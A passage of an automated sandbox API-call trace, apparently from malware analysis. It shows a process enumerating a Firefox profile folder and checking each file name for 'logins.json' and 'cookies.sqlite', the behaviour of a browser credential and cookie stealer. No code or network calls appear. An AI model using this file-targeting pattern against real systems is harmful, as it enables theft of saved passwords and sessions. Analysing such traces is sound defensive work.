AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.220] GetProcessHeap () returned 0x8e0000 [0161.220] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.220] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="minidumps", cAlternateFileName="MINIDU~1")) returned 1 [0161.220] lstrcmpiW (lpString1="minidumps", lpString2=".") returned 1 [0161.221] lstrcmpiW (lpString1="minidumps", lpString2="..") returned 1 [0161.221] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.221] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.221] lstrlenW (lpString="\\") returned 1 [0161.221] GetProcessHeap () returned 0x8e0000 [0161.221] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.221] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.221] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.221] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.221] lstrlenW (lpString="minidumps") returned 9 [0161.221] GetProcessHeap () returned 0x8e0000 [0161.221] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x925780 [0161.221] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.221] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="minidumps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0161.221] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.221] GetProcessHeap () returned 0x8e0000 [0161.221] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.221] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned 97 [0161.221] lstrlenW (lpString="") returned 0 [0161.221] GetProcessHeap () returned 0x8e0000 [0161.221] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x925850 [0161.221] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0161.221] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0161.221] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned 97 [0161.221] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned 97 [0161.221] lstrlenW (lpString="\\*.*") returned 4 [0161.221] GetProcessHeap () returned 0x8e0000 [0161.221] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0161.221] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0161.221] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*.*" [0161.221] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*.*", lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0161.221] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.221] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.222] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.222] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.222] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0161.222] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0161.222] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2deffc, dwLength=0x1c | out: lpBuffer=0x2deffc*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.222] GetProcessHeap () returned 0x8e0000 [0161.222] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.222] VirtualQuery (in: lpAddress=0x925850, lpBuffer=0x2deffc, dwLength=0x1c | out: lpBuffer=0x2deffc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.222] GetProcessHeap () returned 0x8e0000 [0161.222] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925850 | out: hHeap=0x8e0000) returned 1 [0161.222] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.222] GetProcessHeap () returned 0x8e0000 [0161.222] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.222] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.222] lstrlenW (lpString="\\") returned 1 [0161.222] GetProcessHeap () returned 0x8e0000 [0161.222] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.222] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.222] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.222] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.222] lstrlenW (lpString="minidumps") returned 9 [0161.222] GetProcessHeap () returned 0x8e0000 [0161.222] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x925780 [0161.222] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.222] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="minidumps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0161.222] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.222] GetProcessHeap () returned 0x8e0000 [0161.222] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.222] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps", lpSrch="logins.json") returned 0x0 [0161.222] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps", lpSrch="cookies.sqlite") returned 0x0 [0161.222] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.222] GetProcessHeap () returned 0x8e0000 [0161.223] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.223] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x80696ec0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="parent.lock", cAlternateFileName="PARENT~1.LOC")) returned 1 [0161.223] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.223] lstrlenW (lpString="\\") returned 1 [0161.223] GetProcessHeap () returned 0x8e0000 [0161.223] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.223] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.223] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.223] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.223] lstrlenW (lpString="parent.lock") returned 11 [0161.223] GetProcessHeap () returned 0x8e0000 [0161.223] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x925780 [0161.223] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.223] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="parent.lock" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock" [0161.223] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.223] GetProcessHeap () returned 0x8e0000 [0161.223] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.223] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock", lpSrch="logins.json") returned 0x0 [0161.223] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock", lpSrch="cookies.sqlite") returned 0x0 [0161.223] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.223] GetProcessHeap () returned 0x8e0000 [0161.223] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.223] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb43eb830, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb43eb830, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3b3f6e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="permissions.sqlite", cAlternateFileName="PERMIS~1.SQL")) returned 1 [0161.223] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.223] lstrlenW (lpString="\\") returned 1 [0161.223] GetProcessHeap () returned 0x8e0000 [0161.223] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.223] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.223] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.223] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.223] lstrlenW (lpString="permissions.sqlite") returned 18 [0161.223] GetProcessHeap () returned 0x8e0000 [0161.223] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd6) returned 0x925780 [0161.223] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.224] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="permissions.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" [0161.224] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.224] GetProcessHeap () returned 0x8e0000 [0161.224] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.224] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite", lpSrch="logins.json") returned 0x0 [0161.224] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.224] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.224] GetProcessHeap () returned 0x8e0000 [0161.224] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.224] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4c1a3d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4c1a3d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x82b58970, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xa00000, dwReserved0=0x0, dwReserved1=0x0, cFileName="places.sqlite", cAlternateFileName="PLACES~1.SQL")) returned 1 [0161.224] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.224] lstrlenW (lpString="\\") returned 1 [0161.224] GetProcessHeap () returned 0x8e0000 [0161.224] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.224] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.224] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.224] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.224] lstrlenW (lpString="places.sqlite") returned 13 [0161.224] GetProcessHeap () returned 0x8e0000 [0161.224] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0161.224] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.224] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="places.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" [0161.224] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.224] GetProcessHeap () returned 0x8e0000 [0161.224] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.224] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite", lpSrch="logins.json") returned 0x0 [0161.224] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.224] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.224] GetProcessHeap () returned 0x8e0000 [0161.224] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.224] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: 